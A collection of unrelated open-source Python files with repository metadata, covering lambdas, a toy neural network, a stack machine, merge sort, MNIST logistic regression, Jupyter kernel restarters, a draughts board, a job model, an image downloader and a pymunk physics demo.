lambda_square = lambda x: x**2
print (square(5))
print (lambda_square(5))
# a recursive function to calculate the factorial of a number
def fat(n):
if (n == 0):
return 1
return (n * fat(n - 1))
# Lambda expression to calculate the factorial of a number
lambda_fat = lambda x: x * lambda_fat(x - 1) if x > 0 else 1
print (fat (5))
print (lambda_fat(5))
# Map: Apply function to every item of iterable and return a list of the results
l = [2, 4, 6, 8]
m = map(lambda x: x ** 2, l)
for i in m:
print (i)
# Reduce: Performing some computation on a list and returning the result
# removed from python 3, to use we must import functools
from functools import reduce
print (reduce(lambda x, y: x + y, [1, 2, 3, 4, 5]))
# Filter: Creates a list of elements for which a function returns true
f = filter(lambda x: x % 2 == 0, range(10))
for i in f:
print (i) | {
"repo_name": "felipeparpinelli/algorithms_and_data_structures",
"path": "functional_programming.py",
"copies": "1",
"size": "1032",
"license": "mit",
"hash": -7420935206150086000,
"line_mean": 24.1951219512,
"line_max": 80,
"alpha_frac": 0.6879844961,
"autogenerated": false,
"ratio": 3.1559633027522938,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9175136035727363,
"avg_score": 0.033762352624986246,
"num_lines": 41
} |
"""A basic implementation of a Neural Network
by following the tutorial by Andrew Trask
http://iamtrask.github.io/2015/07/12/basic-python-network/
"""
import numpy as np
# sigmoid activation function
def nonlin(x, deriv=False):
    """Sigmoid of x; with deriv=True, the sigmoid derivative expressed
    in terms of the sigmoid *output* x, i.e. x * (1 - x)."""
    if deriv:
        return x * (1 - x)
    return 1 / (1 + np.exp(-x))
# input dataset
x = np.array([[0, 0, 1],
[0, 1, 1],
[1, 0, 1],
[1, 1, 1]])
# output dataset
y = np.array([[0, 0, 1, 1]]).T
# seed random numbers to make calculation
# deterministic (good practice)
np.random.seed(1)
# initialize weights randomly with mean 0
syn0 = 2*np.random.random((3, 1)) - 1
for i in xrange(10000):
# forward propagation
l0 = x
l1 = nonlin(np.dot(l0, syn0))
print l1
break
# how much did we miss
l1_error = y - l1
# multiply how much we missed by the
# slope of the sigmoid at the values in l1
l1_delta = l1_error * nonlin(l1, True)
# update weights
syn0 += np.dot(l0.T, l1_delta)
print 'Output after training:'
print l1
| {
"repo_name": "alexandercrosson/ml",
"path": "neural_network/basic.py",
"copies": "1",
"size": "1043",
"license": "mit",
"hash": 2972435385755649500,
"line_mean": 20.2857142857,
"line_max": 58,
"alpha_frac": 0.6049856184,
"autogenerated": false,
"ratio": 3.0231884057971015,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9106464705549007,
"avg_score": 0.004341863729618832,
"num_lines": 49
} |
"""A basic implementation of a pushdown stack,
using a subclassed Python list."""
# -*- coding: utf-8 -*-
__author__ = """Chris Tabor (dxdstudio@gmail.com)"""
# True only when this module is executed as a script (not imported).
# (the comparison already yields a bool; no need for "True if ... else False")
IS_MAIN = __name__ == '__main__'
if IS_MAIN:
    from os import getcwd
    # import sys directly; "from os import sys" relied on os happening
    # to import sys internally, which is an implementation detail
    import sys
    sys.path.append(getcwd())
import operator
from MOAL.helpers.display import Section
class StackMachine(list):
    """A pushdown stack machine implemented as a subclassed Python list.

    `append` tokenizes a simple infix expression (e.g. "2 + 3"):
    numeric tokens become "push N" instructions appended to the stack,
    while operator tokens are translated to words and inserted at
    index 0, so the stack layout becomes [operator, push-a, push-b].
    `evaluate` then pops the two operands and the operator and applies it.
    """

    def __init__(self, *args, **kwargs):
        super(StackMachine, self).__init__(*args, **kwargs)

    def __str__(self):
        # one instruction per line
        return '\n'.join(self)

    def _from_operator(self, token):
        """Translate an infix operator symbol to its instruction word;
        any other token is treated as an operand to push."""
        if token == '/':
            return 'divide'
        elif token == '*':
            return 'multiply'
        elif token == '+':
            return 'add'
        elif token == '-':
            return 'subtract'
        else:
            return 'push {}'.format(token)

    def _to_operator(self, token):
        """Translate an instruction word to the callable implementing it.

        NOTE(review): operator.div exists only in Python 2 (classic/floor
        division on ints); Python 3 would need operator.truediv or
        operator.floordiv. Unknown words fall through and return None.
        """
        if token == 'divide':
            return operator.div
        elif token == 'multiply':
            return operator.mul
        elif token == 'add':
            return operator.add
        elif token == 'subtract':
            return operator.sub

    def evaluate(self):
        """Evaluate items on the stack.

        In this case, it should only be the first three items:
        [operand, operand, operator].

        NOTE(review): operand1 is the most recently pushed value, so an
        infix expression "a / b" is actually evaluated as b / a; the
        expected values in __main__ rely on this reversed operand order
        (and, for division, on Python 2 integer division).
        """
        operand1, operand2, operator = (
            int(self.pop().replace('push ', '')),
            int(self.pop().replace('push ', '')),
            self._to_operator(self.pop()),
        )
        res = operator(operand1, operand2)
        print('evaluation result = {}'.format(res))
        return res

    def append(self, val):
        """Add an item to stack.

        Expressions are tokenized and then sorted so the operands are the first
        two indices, which are evaluated ala prefix notation using LIFO.

        Values without a .split method (non-strings) are silently ignored.
        """
        # sub = []
        try:
            vals = val.split(' ')
        except AttributeError:
            return
        for token in vals:
            try:
                # numeric tokens become "push N" and go on top of the stack
                token = 'push {}'.format(int(token))
                super(StackMachine, self).append(token)
            except ValueError:
                # operator (non-numeric) tokens go to the front of the stack
                super(StackMachine, self).insert(
                    0, self._from_operator(token))
if IS_MAIN:
    with Section('Pushdown stack'):
        # (expected result, infix expression) pairs. The expected values
        # reflect this machine's reversed operand order plus Python 2
        # integer division: e.g. '1 / 10' actually computes 10 / 1 = 10,
        # and '10 / 2' computes 2 / 10 = 0.
        exprs = [
            (5, '2 + 3'),
            (3, '3 * 1'),
            (999, '0 + 999'),
            (1000, '10 * 100'),
            (-1000, '-10 * 100'),
            (0, '0 * 1'),
            (1, '1 / 1'),
            (10, '1 / 10'),
            (0, '10 / 2'),
            (5, '2 / 10'),
        ]
        smachine = StackMachine()
        for expected, expr in exprs:
            smachine.append(expr)
            actual = smachine.evaluate()
            print('Expected {}, Res = {}'.format(expected, actual))
            assert expected == actual
        print(smachine)
| {
"repo_name": "christabor/MoAL",
"path": "MOAL/automata_theory/stack_machine.py",
"copies": "1",
"size": "2927",
"license": "apache-2.0",
"hash": -2736041161995323400,
"line_mean": 26.1018518519,
"line_max": 79,
"alpha_frac": 0.4933378886,
"autogenerated": false,
"ratio": 4.217579250720461,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5210917139320461,
"avg_score": null,
"num_lines": null
} |
# A basic implementation of merge sort - https://en.wikipedia.org/wiki/Merge_sort
# Uses O(n) storage space
# TODO allocate a work array at beginning instead of smaller, more frequent allocations
# and optimize space usage
# A recursive implementation
def mergesort_rec(array, left=0, right=None):
if right is None:
right = len(array) - 1
if left == right:
return [array[left]]
m = (left + right) // 2
sleft = mergesort_rec(array, left, m)
sright = mergesort_rec(array, m + 1, right)
return _merge(sleft, sright)
# A bottom-up, iterative implementation
def mergesort(array):
w = 1
while w <= len(array):
for i in range(0, len(array), 2 * w):
a = array[i: i + w]
b = array[i + w: i + 2 * w]
merged = _merge(a, b)
# write sorted, merged array over original array
for j, v in enumerate(merged, i):
array[j] = v
w *= 2
def _merge(sleft, sright):
i = j = 0
a = []
while i < len(sleft) and j < len(sright):
if sleft[i] > sright[j]:
a.append(sright[j])
j += 1
else:
a.append(sleft[i])
i += 1
# merge remaining list
r, k = (sleft, i) if j == len(sright) else (sright, j)
while k < len(r):
a.append(r[k])
k += 1
return a
if __name__ == '__main__':
    import random
    # quick smoke test: sort a random sequence in place and show it
    values = [random.randint(-10, 10) for _ in range(20)]
    print("Unsorted", values)
    mergesort(values)
    print("Sorted", values)
| {
"repo_name": "calebperkins/algorithms",
"path": "algorithms/mergesort.py",
"copies": "1",
"size": "1544",
"license": "mit",
"hash": -2571218328630572500,
"line_mean": 24.3114754098,
"line_max": 87,
"alpha_frac": 0.5440414508,
"autogenerated": false,
"ratio": 3.313304721030043,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.43573461718300427,
"avg_score": null,
"num_lines": null
} |
# a basic implementation of the MNIST classifier through multinomial logistic regression
# NOTE(review): written against the TensorFlow 1.x API (placeholders,
# InteractiveSession) and the deprecated tensorflow.examples.tutorials.mnist
# loader; it will not run unmodified under TensorFlow 2.x.
import tensorflow as tf
# import the dataset called MNIST for handwritten digit classification
from tensorflow.examples.tutorials.mnist import input_data
mnist_data = input_data.read_data_sets("MNIST_data/", one_hot=True)
# create the input placeholder variable which represents our independent variable
# here x is a rank 2 tensor with arbitrary size 1st dimension and 784 as the 2nd dimension
x = tf.placeholder(tf.float32, [None, 784])
# the linear weight matrix W and bias vector b are the parameters to be learnt in our model
# here we are predicting y as softmax(W*x + b)
# W is a [784, 10] rank 2 tensor and b is a [10] rank 1 tensor
W = tf.Variable(tf.zeros([784, 10]))
b = tf.Variable(tf.zeros([10]))
# we define the model by the softmax (multinomial logistic regression model) equation as stated above
model = tf.nn.softmax(tf.matmul(x, W) + b)
# our loss function will be the cross entropy function of our predictions weighted by the actual values
y = tf.placeholder(tf.float32, [None, 10])
# here the sum is taken over the second dimension of y (of size 10) and the mean over the batch size (first dimension)
# cross_entropy_loss = tf.reduce_mean(-tf.reduce_sum(y * tf.log(model), reduction_indices=[1]))
# the above is numerically unstable (will do a test later) so we will resort to use the tensorflow implementation,
# which fuses softmax and cross-entropy over the raw logits
cross_entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=tf.matmul(x, W) + b, labels=y))
# define the training graph of the model to use gradient descent
alpha = 0.4
train_step = tf.train.GradientDescentOptimizer(alpha).minimize(cross_entropy_loss)
# run the gradient descent algorithm for a pre-specified number of iterations
num_of_iterations = 1000
batch_size = 100
session = tf.InteractiveSession()
tf.global_variables_initializer().run()
# here we are applying stochastic gradient descent by only using a portion of the training data (chosen at random)
# on each iteration
for i in range(num_of_iterations):
batch_xs, batch_ys = mnist_data.train.next_batch(batch_size)
session.run(train_step, {x: batch_xs, y: batch_ys})
loss_value = session.run(cross_entropy_loss, {x: batch_xs, y: batch_ys})
print("Value of the loss function (cross entropy) on iteration %s: %s" % (i, loss_value))
# we evaluate the predictive correctness of the model by measuring the deviation from the true values
correctness_metric = tf.equal(tf.argmax(model, 1), tf.argmax(y,1))
# the above returns a rank 1 tensor of booleans which we will cast to numbers and calculate the mean
accuracy = tf.reduce_mean(tf.cast(correctness_metric, tf.float32))
# the accuracy metric is then calculated on the test data
print(session.run(accuracy, {x: mnist_data.test.images, y: mnist_data.test.labels}))
| {
"repo_name": "RMDev97/Tensor-Flow-Projects",
"path": "MNIST/mnist_basic.py",
"copies": "1",
"size": "2852",
"license": "apache-2.0",
"hash": 7788956957770939000,
"line_mean": 44.2698412698,
"line_max": 118,
"alpha_frac": 0.7545582048,
"autogenerated": false,
"ratio": 3.5340768277571253,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9695081564072272,
"avg_score": 0.018710693696970617,
"num_lines": 63
} |
"""A basic in process kernel monitor with autorestarting.
This watches a kernel's state using KernelManager.is_alive and auto
restarts the kernel if it dies.
"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import warnings
from zmq.eventloop import ioloop
from jupyter_client.restarter import KernelRestarter
from traitlets import (
Instance,
)
class IOLoopKernelRestarter(KernelRestarter):
    """Poll a kernel on the tornado IO loop and autorestart it if it dies."""

    # Tornado IO loop used to schedule the periodic poll.
    loop = Instance('tornado.ioloop.IOLoop')

    def _loop_default(self):
        # Dynamic trait default; configuring ``loop`` directly is deprecated.
        warnings.warn("IOLoopKernelRestarter.loop is deprecated in jupyter-client 5.2",
            DeprecationWarning, stacklevel=4,
        )
        return ioloop.IOLoop.current()

    # Handle to the active PeriodicCallback, or None while stopped.
    _pcallback = None

    def start(self):
        """Begin periodic polling of the kernel (no-op if already polling)."""
        if self._pcallback is not None:
            return
        self._pcallback = ioloop.PeriodicCallback(
            self.poll, 1000 * self.time_to_dead,
        )
        self._pcallback.start()

    def stop(self):
        """Cancel the periodic poll, if one is running."""
        if self._pcallback is None:
            return
        self._pcallback.stop()
        self._pcallback = None
class AsyncIOLoopKernelRestarter(IOLoopKernelRestarter):
    """Restarter variant for kernel managers with coroutine-based APIs."""
    async def poll(self):
        # Periodic liveness check driven by the base class's PeriodicCallback.
        if self.debug:
            self.log.debug('Polling kernel...')
        is_alive = await self.kernel_manager.is_alive()
        if not is_alive:
            # Track how many consecutive polls have found the kernel dead.
            if self._restarting:
                self._restart_count += 1
            else:
                self._restart_count = 1
            if self._restart_count >= self.restart_limit:
                # Too many consecutive failures: give up and notify listeners.
                self.log.warning("AsyncIOLoopKernelRestarter: restart failed")
                self._fire_callbacks('dead')
                self._restarting = False
                self._restart_count = 0
                self.stop()
            else:
                # NOTE(review): ``random_ports_until_alive`` and
                # ``_initial_startup`` are defined outside this chunk
                # (base class / traits) — confirm their semantics there.
                newports = self.random_ports_until_alive and self._initial_startup
                self.log.info('AsyncIOLoopKernelRestarter: restarting kernel (%i/%i), %s random ports',
                    self._restart_count,
                    self.restart_limit,
                    'new' if newports else 'keep'
                )
                self._fire_callbacks('restart')
                await self.kernel_manager.restart_kernel(now=True, newports=newports)
                self._restarting = True
        else:
            # Kernel is alive: clear startup/restart bookkeeping.
            if self._initial_startup:
                self._initial_startup = False
            if self._restarting:
                self.log.debug("AsyncIOLoopKernelRestarter: restart apparently succeeded")
            self._restarting = False
| {
"repo_name": "sserrot/champion_relationships",
"path": "venv/Lib/site-packages/jupyter_client/ioloop/restarter.py",
"copies": "1",
"size": "2664",
"license": "mit",
"hash": -581819577748755200,
"line_mean": 31.8888888889,
"line_max": 103,
"alpha_frac": 0.5938438438,
"autogenerated": false,
"ratio": 4.3387622149837135,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5432606058783713,
"avg_score": null,
"num_lines": null
} |
"""A basic in process kernel monitor with autorestarting.
This watches a kernel's state using KernelManager.is_alive and auto
restarts the kernel if it dies.
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2013 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from __future__ import absolute_import
from zmq.eventloop import ioloop
from IPython.kernel.restarter import KernelRestarter
from IPython.utils.traitlets import (
Instance,
)
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
class IOLoopKernelRestarter(KernelRestarter):
    """Poll a kernel on the zmq IO loop and autorestart it if it dies."""

    # The zmq/tornado IO loop used to schedule the periodic poll.
    loop = Instance('zmq.eventloop.ioloop.IOLoop', allow_none=False)

    def _loop_default(self):
        # Dynamic trait default: fall back to the global IO loop singleton.
        return ioloop.IOLoop.instance()

    # Handle to the active PeriodicCallback, or None while stopped.
    _pcallback = None

    def start(self):
        """Begin periodic polling of the kernel (no-op if already polling)."""
        if self._pcallback is not None:
            return
        self._pcallback = ioloop.PeriodicCallback(
            self.poll, 1000 * self.time_to_dead, self.loop
        )
        self._pcallback.start()

    def stop(self):
        """Cancel the periodic poll, if one is running."""
        if self._pcallback is None:
            return
        self._pcallback.stop()
        self._pcallback = None
| {
"repo_name": "mattvonrocketstein/smash",
"path": "smashlib/ipy3x/kernel/ioloop/restarter.py",
"copies": "1",
"size": "1727",
"license": "mit",
"hash": 1995729370133842200,
"line_mean": 29.8392857143,
"line_max": 78,
"alpha_frac": 0.4829183555,
"autogenerated": false,
"ratio": 5.233333333333333,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00135623869801085,
"num_lines": 56
} |
# This code is licensed under the MIT License.
#
# MIT License
#
# Copyright (c) 2016 Luca Vallerini
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Author: Luca Vallerini
# E-mail: lucavall90@gmail.com
#
# Date: 2016-10-31
# Last update: 2016-10-31
from array import array
# Draw the board game
def draw_board_game(values):
    """Print the 8x8 draughts board held in *values*.

    ``values`` is a 64-entry sequence of one-character strings, row-major
    (index = 8 * row + column).

    Uses single-argument ``print(...)`` calls, which are valid in both
    Python 2 (as a parenthesized expression) and Python 3 — the original
    ``print`` *statements* were a SyntaxError under Python 3.
    """
    print(" 1 2 3 4 5 6 7 8")  # columns coordinates
    for i in range(8):
        print(" " + " ---" * 8)
        row = str(i + 1) + " "  # lines coordinates
        for j in range(8):
            if j == 7:
                row += "| " + values[8 * i + j] + " |"
            else:
                row += "| " + values[8 * i + j] + " "
        print(row)
    print(" " + " ---" * 8)
# Start the game
def start():
    """Greet the players and draw the opening Italian draughts position.

    'x' pieces fill the dark squares of the first three rows and 'y'
    pieces the dark squares of the last three rows; every other square
    is blank.
    """
    print("Welcome to Italian draughts!\n")
    # A plain list replaces array('c', ...): the 'c' typecode was removed
    # in Python 3, and the board is only ever indexed, so a list behaves
    # identically here.
    board = []
    for i in range(64):
        if ((0 <= i < 8 or 16 <= i < 24) and i % 2 == 0) or ((8 <= i < 16) and (i + 1) % 2 == 0):
            board.append('x')
        elif ((40 <= i < 48 or 56 <= i < 64) and (i + 1) % 2 == 0) or ((48 <= i < 56) and i % 2 == 0):
            board.append('y')
        else:
            board.append(' ')
    draw_board_game(board)


# Guard the entry point so importing this module does not print the board.
if __name__ == "__main__":
    start()
| {
"repo_name": "lucavallerini/miscellanea",
"path": "dama/dama.py",
"copies": "1",
"size": "2251",
"license": "mit",
"hash": -7245532720909321000,
"line_mean": 30.7042253521,
"line_max": 102,
"alpha_frac": 0.6183918259,
"autogenerated": false,
"ratio": 3.5958466453674123,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4714238471267412,
"avg_score": null,
"num_lines": null
} |
""" A basic job model, and local job implementation.
author: Brian Schrader
since: 2016-01-04
"""
import os
import sys
from subprocess import Popen, PIPE
def call(args, stdout=PIPE, stderr=PIPE):
    """ Calls the given arguments in a seperate process
    and returns the contents of standard out.

    Output is decoded to text using the console encoding when possible;
    on decoding failure (or when a stream was not captured) the raw
    values are returned unchanged.
    """
    p = Popen(args, stdout=stdout, stderr=stderr)
    out, err = p.communicate()
    # Original referenced ``sys`` without importing it, so the decode
    # always raised NameError and raw bytes were silently returned.
    # sys.stdout may be replaced (e.g. under test runners) and its
    # encoding may be missing/None, hence the getattr + fallback.
    encoding = getattr(sys.stdout, 'encoding', None) or sys.getdefaultencoding()
    try:
        return out.decode(encoding), err.decode(encoding)
    except Exception:
        return out, err
class Job(object):
    """ A template job class that just runs the given command script locally.

    To make your own custom jobs, subclass this Job and override the status methods, the submit method, and cmd property.

    Submitting a job cannot block execution. The submit call should return
    immediately so that other jobs can be executed, and tracked.
    """

    JOB_FILE_PATTERN = 'metapipe.{}.job'
    MAX_RETRY = 5

    def __init__(self, alias, command, depends_on=None):
        """ Create an new job with the given name, and command.

        :param alias: unique name; also used to derive the job file name.
        :param command: object exposing ``eval()`` that renders the script
            text (see :meth:`make`).
        :param depends_on: optional list of prerequisite jobs.
        """
        self.command = command
        # A fresh list per instance avoids the shared-mutable-default bug
        # of the original ``depends_on=[]`` signature.
        self.depends_on = [] if depends_on is None else depends_on
        self.alias = alias
        self.attempts = 0
        self.filename = self.JOB_FILE_PATTERN.format(self.alias)

    def __repr__(self):
        return '<Job: {}>'.format(self.cmd)

    def __cmp__(self, other):
        # Python 2 ordering hook (ignored by Python 3); kept for
        # backward compatibility.
        return cmp(self.alias, other.alias)

    def __lt__(self, other):
        # Python 3 ordering: jobs sort by alias, matching __cmp__ above.
        return self.alias < other.alias

    def make(self):
        """ Evaluate the command, and write it to a file. """
        # Renamed from ``eval`` to avoid shadowing the builtin.
        script = self.command.eval()
        with open(self.filename, 'w') as f:
            f.write(script)

    @property
    def should_retry(self):
        # True while fewer than MAX_RETRY attempts have been made.
        return self.attempts < self.MAX_RETRY

    # Override these...

    @property
    def cmd(self):
        """ Returns the command needed to submit the calculations.
        Normally, this would be just running the command, however if
        using a queue system, then this should return the command to
        submit the command to the queue.
        """
        pass

    def submit(self):
        """ Submits the job to be run. If an external queue system is used,
        this method submits itself to that queue. Else it runs the job itself.
        :see: call
        """
        pass

    def is_running(self):
        """ Returns whether the job is running or not. """
        pass

    def is_queued(self):
        """ Returns whether the job is queued or not.
        This function is only used if jobs are submitted to an external queue.
        """
        pass

    def is_complete(self):
        """ Returns whether the job is complete or not. """
        pass

    def is_error(self):
        """ Checks to see if the job errored out. """
        pass

    def is_failed(self):
        """ Checks to see if the job has failed. This is usually if the job
        should not be resubmitted.
        """
        pass
| {
"repo_name": "Sonictherocketman/metapipe",
"path": "metapipe/models/job.py",
"copies": "2",
"size": "2869",
"license": "mit",
"hash": 3285695016634496000,
"line_mean": 27.4059405941,
"line_max": 121,
"alpha_frac": 0.6151969327,
"autogenerated": false,
"ratio": 4.212922173274596,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5828119105974596,
"avg_score": null,
"num_lines": null
} |
"""A basic kernel monitor with autorestarting.
This watches a kernel's state using KernelManager.is_alive and auto
restarts the kernel if it dies.
It is an incomplete base class, and must be subclassed.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from IPython.config.configurable import LoggingConfigurable
from IPython.utils.traitlets import (
Instance, Float, Dict, Bool, Integer,
)
class KernelRestarter(LoggingConfigurable):
    """Monitor and autorestart a kernel.

    Abstract base: subclasses must implement ``start``/``stop`` to schedule
    the periodic ``poll`` (e.g. on an IO loop).
    """
    kernel_manager = Instance('IPython.kernel.KernelManager')
    debug = Bool(False, config=True,
        help="""Whether to include every poll event in debugging output.
        Has to be set explicitly, because there will be *a lot* of output.
        """
    )
    time_to_dead = Float(3.0, config=True,
        help="""Kernel heartbeat interval in seconds."""
    )
    restart_limit = Integer(5, config=True,
        help="""The number of consecutive autorestarts before the kernel is presumed dead."""
    )
    # True while a restart has been issued and we are waiting for the
    # kernel to come back up.
    _restarting = Bool(False)
    # Count of consecutive failed polls since the last successful one.
    _restart_count = Integer(0)
    # Maps event name ('restart' / 'dead') -> list of zero-arg callables.
    callbacks = Dict()
    def _callbacks_default(self):
        # Dynamic trait default: one empty callback list per event.
        return dict(restart=[], dead=[])
    def start(self):
        """Start the polling of the kernel."""
        raise NotImplementedError("Must be implemented in a subclass")
    def stop(self):
        """Stop the kernel polling."""
        raise NotImplementedError("Must be implemented in a subclass")
    def add_callback(self, f, event='restart'):
        """register a callback to fire on a particular event
        Possible values for event:
        'restart' (default): kernel has died, and will be restarted.
        'dead': restart has failed, kernel will be left dead.
        """
        self.callbacks[event].append(f)
    def remove_callback(self, f, event='restart'):
        """unregister a callback to fire on a particular event
        Possible values for event:
        'restart' (default): kernel has died, and will be restarted.
        'dead': restart has failed, kernel will be left dead.
        """
        try:
            self.callbacks[event].remove(f)
        except ValueError:
            # Removing a callback that was never registered is a no-op.
            pass
    def _fire_callbacks(self, event):
        """fire our callbacks for a particular event"""
        for callback in self.callbacks[event]:
            try:
                callback()
            except Exception as e:
                # A failing callback is logged but never propagates.
                self.log.error(
                    "KernelRestarter: %s callback %r failed", event, callback, exc_info=True)
    def poll(self):
        # Liveness check, expected to run every ``time_to_dead`` seconds.
        if self.debug:
            self.log.debug('Polling kernel...')
        if not self.kernel_manager.is_alive():
            # Count consecutive dead polls; reset to 1 if this is a new death.
            if self._restarting:
                self._restart_count += 1
            else:
                self._restart_count = 1
            if self._restart_count >= self.restart_limit:
                # Give up: notify 'dead' listeners and stop polling.
                self.log.warn("KernelRestarter: restart failed")
                self._fire_callbacks('dead')
                self._restarting = False
                self._restart_count = 0
                self.stop()
            else:
                self.log.info('KernelRestarter: restarting kernel (%i/%i)',
                    self._restart_count,
                    self.restart_limit
                )
                self._fire_callbacks('restart')
                self.kernel_manager.restart_kernel(now=True)
                self._restarting = True
        else:
            if self._restarting:
                self.log.debug("KernelRestarter: restart apparently succeeded")
            self._restarting = False
| {
"repo_name": "mattvonrocketstein/smash",
"path": "smashlib/ipy3x/kernel/restarter.py",
"copies": "1",
"size": "3781",
"license": "mit",
"hash": 475428733550827140,
"line_mean": 32.1666666667,
"line_max": 113,
"alpha_frac": 0.572335361,
"autogenerated": false,
"ratio": 4.70273631840796,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.577507167940796,
"avg_score": null,
"num_lines": null
} |
"""A basic module designed to download images on your server.
Please note this is always a risky thing to do.
I've added a pretty basic safety that will check what we downloaded
is REALLY an image, however this could prove not to be enough,
so use with caution."""
import urllib2
import os
from PIL import Image
def download(path, url, count):
    """Download the image at *url* into *path*, naming it from *count*.

    The destination name is the hexadecimal of ``count + 1`` (because hex
    are cool) plus the URL's extension.  The bare file name — without the
    path — is returned so it can be stored in a database.
    """
    extension = url.split(".")[-1]
    hex_name = next_as_hexa(count) + '.' + extension
    destination = path + hex_name
    download_url_to(url, destination)
    return hex_name
def download_url_to(url, filename):
    """Download a file, byte from byte, from a given URL and check it is an image.

    If it is not an image, remove the file and raise an IOError.

    Fixes over the original: the destination file handle is now closed on
    every path (``with``), the HTTP response is closed (``finally``), and
    the unused ``meta`` local was dropped.
    """
    u = urllib2.urlopen(url)
    try:
        with open(filename, 'wb') as f:
            block_sz = 8192
            while True:
                buffer = u.read(block_sz)
                if not buffer:
                    break
                f.write(buffer)
    finally:
        # urllib2 responses are not context managers, so close explicitly.
        u.close()
    if not check_if_image(filename):
        # Not an image : let's delete this, better safe than sorry
        os.remove(filename)
        raise IOError("This is not an image !")
def check_if_image(filename):
    """Return True when PIL can open *filename* as an image.

    PIL raising IOError on open is taken as "not an image".
    """
    try:
        Image.open(filename)
        return True
    except IOError:
        return False
def size_of_folder(basis):
    """Return the total size of the static img repo as a human string."""
    total_bytes = 0
    for entry in os.listdir(basis + "static/img"):
        total_bytes += os.path.getsize(basis + "static/img/" + entry)
    return bytes_as_megabytes(total_bytes)
def bytes_as_megabytes(num):
    """Render *num* bytes as whole decimal megabytes, e.g. ``"3MB"``.

    Uses 10^6 bytes per MB and floors the result.  Should be improved to
    handle GB.
    """
    megabytes = num // 1000000
    return "{0}MB".format(megabytes)
def next_as_hexa(num):
    """Return ``num + 1`` formatted as a ``0x``-prefixed hex string."""
    return format(num + 1, '#x')
| {
"repo_name": "Raveline/Gullom",
"path": "downloader.py",
"copies": "1",
"size": "2129",
"license": "mit",
"hash": 2368521082937261600,
"line_mean": 35.7068965517,
"line_max": 122,
"alpha_frac": 0.6580554251,
"autogenerated": false,
"ratio": 3.6146010186757214,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47726564437757213,
"avg_score": null,
"num_lines": null
} |
"""A basic playground. Most interesting function is draw a shape, basically
move the mouse as you want and pymunk will approximate a Poly shape from the
drawing.
"""
__docformat__ = "reStructuredText"
import pygame
import pymunk as pm
import pymunk.util as u
from pymunk import Vec2d
# TODO: Clean up code
# Collision type identifiers assigned to shapes when they are added to the space.
COLLTYPE_DEFAULT = 0  # used for every ball, box, polygon and wall created below
COLLTYPE_MOUSE = 1  # reserved for mouse interaction (not referenced in this chunk)
class PhysicsDemo:
    """Interactive pygame/pymunk sandbox.

    Spawn balls, boxes, free-drawn polygons and wall segments with the
    mouse (see the on-screen help text) and watch them simulate under
    gravity.  ``run`` drives the event/step/draw loop until quit.
    """
    def flipyv(self, v):
        # Convert a pymunk vector (y grows upward) to a pygame pixel
        # coordinate pair (y grows downward).
        return int(v.x), int(-v.y + self.h)
    def __init__(self):
        self.running = True
        ### Init pygame and create screen
        pygame.init()
        self.w, self.h = 600, 600
        self.screen = pygame.display.set_mode((self.w, self.h))
        self.clock = pygame.time.Clock()
        ### Init pymunk and create space
        self.space = pm.Space()
        self.space.gravity = (0.0, -900.0)
        ### Walls
        self.walls = []
        self.create_wall_segments([(100, 50), (500, 50)])
        ## Balls
        # balls = [createBall(space, (100,300))]
        self.balls = []
        ### Polys
        # Start with a single vertical stack of small boxes above the floor.
        self.polys = []
        h = 10
        for y in range(1, h):
            # for x in range(1, y):
            x = 0
            s = 10
            p = Vec2d(300, 40) + Vec2d(0, y * s * 2)
            self.polys.append(self.create_box(p, size=s, mass=1))
        self.run_physics = True
        ### Wall under construction
        self.wall_points = []
        ### Poly under construction
        self.poly_points = []
        self.shape_to_remove = None
        self.mouse_contact = None
    def draw_helptext(self):
        # Render the keyboard/mouse cheat sheet in the top-left corner.
        font = pygame.font.Font(None, 16)
        text = [
            "LMB: Create ball",
            "LMB + Shift: Create box",
            "RMB on object: Remove object",
            "RMB(hold) + Shift: Create polygon, release to finish (we be converted to a convex hull of the points)",
            "RMB + Ctrl: Create wall, release to finish",
            "Space: Stop physics simulation",
            "k: Spawn a bunch of blocks",
            "f: Fire a ball from the top left corner",
        ]
        y = 5
        # ``text`` is rebound to a Surface inside the loop; iteration over
        # the original list object is unaffected by the rebinding.
        for line in text:
